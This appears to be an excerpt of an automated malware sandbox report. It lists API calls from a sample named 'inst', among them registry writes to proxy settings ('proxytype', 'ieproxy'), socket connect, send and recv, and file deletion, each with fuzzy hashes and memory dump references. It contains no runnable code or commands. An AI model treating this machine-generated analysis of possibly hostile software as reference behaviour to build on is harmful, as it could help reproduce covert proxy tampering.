                                                                                                                                                                      • Opcode ID: 2fc6311a118a79d63f124e98dc89630e5abd5456607a6f8c624c2ee476cd98c2
                                                                                                                                                                      • Instruction ID: 06e6f9ccc340d0d03e90e8ae3b667ce052a20b13f0579da7994843545fea6d85
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc6311a118a79d63f124e98dc89630e5abd5456607a6f8c624c2ee476cd98c2
                                                                                                                                                                      • Instruction Fuzzy Hash: A4F082365007008FD7249B38F809BD273E9FB54362F15486EE0A6C7045E7B4D986CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,00164DC5,?,00000000,?,00000000,?,?,00161043,?), ref: 00163E9B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 2702f5fdabb35c4d6f74e61abfbc9e5af622b941ec63b87cd5935f7f4cc41dc8
                                                                                                                                                                      • Instruction ID: 74c10e27f710d3f1a5837a6ae83f80e1b98d8b4e8eff0d2ff8c371d7292e09b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2702f5fdabb35c4d6f74e61abfbc9e5af622b941ec63b87cd5935f7f4cc41dc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 19E04FE6B282103EE614B6A47E4AF6B229CDFD0B04F244429B84AD2540FB5199209673
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(00000002,?,00198D5A,00000000,00000000,?,?,001D6931,?,0000011E,FFFFFEE2,00000002,?,00000000,00000000,00000748), ref: 001D6AC1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: d80683ec956ba6354ef95f37c32e74b709ca4f978c2bd24e605e510bb5d29f95
                                                                                                                                                                      • Instruction ID: 231a55755f542a53593892e1182b43c1b3a33487412f9e3a5b11c092d7f6e899
                                                                                                                                                                      • Opcode Fuzzy Hash: d80683ec956ba6354ef95f37c32e74b709ca4f978c2bd24e605e510bb5d29f95
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE0C931500128FB8F109F69DA0199A7BA8EB25391B10C566F856E6290F731DE10EF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,001CFC56,?,?,?,00000000,?,?), ref: 001CA2C2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawGdipImageRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2615643336-0
                                                                                                                                                                      • Opcode ID: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                      • Instruction ID: 90ba91004f110d45a889bd9ba0cb8391f1d09a9c2861f76c6848058c6d854624
                                                                                                                                                                      • Opcode Fuzzy Hash: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                      • Instruction Fuzzy Hash: F4E0483250411DAF9F128F95DD00DA77BE9EF24354B454429BD06C6521D732DC30EBE1
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 001829C2
                                                                                                                                                                        • Part of subcall function 001E4656: RaiseException.KERNEL32(?,?,?,001680B1,?,?,?,?,?,001680B1,0023F5B8,0023F5B8), ref: 001E4698
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3976011213-0
                                                                                                                                                                      • Opcode ID: b555ee60b92cfb922177f159310df76ce9f5f14adb26a723ab1cb57b2127d7e7
                                                                                                                                                                      • Instruction ID: 766bf6723721758a4346afdbd4c11102e522c8b57d78f0579df98bb0f3942c6c
                                                                                                                                                                      • Opcode Fuzzy Hash: b555ee60b92cfb922177f159310df76ce9f5f14adb26a723ab1cb57b2127d7e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BE09271400219BACB22BE86C802AD9BB98AF24364F00842AF89C46150E7B0A6D4CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00199202
                                                                                                                                                                        • Part of subcall function 0017B9B4: __EH_prolog3.LIBCMT ref: 0017B9BB
                                                                                                                                                                        • Part of subcall function 001D5385: __EH_prolog3.LIBCMT ref: 001D538C
                                                                                                                                                                        • Part of subcall function 00198C9F: __EH_prolog3.LIBCMT ref: 00198CA6
                                                                                                                                                                        • Part of subcall function 00198C9F: InterlockedExchange.KERNEL32(?,00003001), ref: 00198E38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$CountExchangeInterlockedTick
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 364811452-0
                                                                                                                                                                      • Opcode ID: 156950e3a86234f53bb549a7c48a3c3e1ab88d778259648e78a188091be28aca
                                                                                                                                                                      • Instruction ID: 82d4cb874c4599534956158b43a0de78fd2c2ef111538b63032cc64ce791730b
                                                                                                                                                                      • Opcode Fuzzy Hash: 156950e3a86234f53bb549a7c48a3c3e1ab88d778259648e78a188091be28aca
                                                                                                                                                                      • Instruction Fuzzy Hash: 52E09231608381AFFF25AB68E81A2EE32E1AB75715F00882EB0D542181CFF44884C653
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,5F4F5B99,proxytype,00000001,proxytype,?,FF4173A1), ref: 5F516CEB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 001789A8
                                                                                                                                                                        • Part of subcall function 001726C0: RegCloseKey.ADVAPI32 ref: 001726CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 47109696-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,00189E1B,?,?,?), ref: 00195914
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1174141254-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001D0426: SetupIterateCabinetW.SETUPAPI(00000000,00000000,001D0376,00000000), ref: 001D0454
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00198D06,?,?,.dir,?), ref: 001D047E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CabinetDeleteFileIterateSetup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3725390358-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,?,5F52D8C5,00000001,?,?,?,5F52DA3E,?,?,?,5F56C420,0000000C,5F52DAF9), ref: 5F530433
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • recvfrom.WS2_32(?,?,?,?,?,?), ref: 5F51FCF4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recvfrom
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 846543921-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 5F5204C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncSelect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3214710386-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 0016E50C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetGetConnectedState.WININET(?,00000000), ref: 001A6821
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectedInternetState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 97057780-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetGetConnectedState.WININET(0017BB49,00000000), ref: 001C8968
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectedInternetState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 97057780-0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(?,?,?,?,?), ref: 001AB440
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BitmapBitsGdipLock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2574020740-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetTimer.USER32(?,00000000,00000064,00000000), ref: 5F51C5D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Timer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2870079774-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1507349165-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • connect.WS2_32(?,00000000,00000000), ref: 5F51FE6A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: connect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1959786783-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,00000000,5F4F5DF0,ieproxy), ref: 5F516D11
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1108222502-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0017DEBA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000002,00198D5A,00000000,?,001D6919,FFFFFEE2,00000002,?,00000000,00000000,00000748,001D6A2D,?,00000000,00000000), ref: 001D6B71
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • setsockopt.WS2_32(?,00000000,00000000,00000000,00000000), ref: 5F51FF6B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: setsockopt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3981526788-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(000000FF,5F4FFE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,5F5BC288,00000000), ref: 5F4EAF8E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 176396367-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 00183D18
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __read
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1330306528-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ioctlsocket.WS2_32(?,?,?), ref: 5F51FED2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ioctlsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3577187118-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 001B2E30
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 001A5E36
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 001A3EF2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibraryAndExitThread.KERNEL32(5F4D0000,00000000,5F4DA86A), ref: 5F4DA570
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitFreeLibraryThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4122534561-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,000007E9,?,?), ref: 001967E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 793501599-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,001A69EF,001A68D3,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,001A74F6,?,&pid=), ref: 001A696A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 1886c90c142b1fcf5bbc5cd801cad02c32adb754f7e13c88d15268c66bb94fbb
                                                                                                                                                                      • Instruction ID: 7b7889f595e32e4982ba64821cee7c5e9b2b7c41c3ceb6eec030331cc60e71c7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1886c90c142b1fcf5bbc5cd801cad02c32adb754f7e13c88d15268c66bb94fbb
                                                                                                                                                                      • Instruction Fuzzy Hash: 19D05E710107118BC7308F24E90835276F8AF00B39F248A0CA5B6875D0C774D8408A50
                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 001829E6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
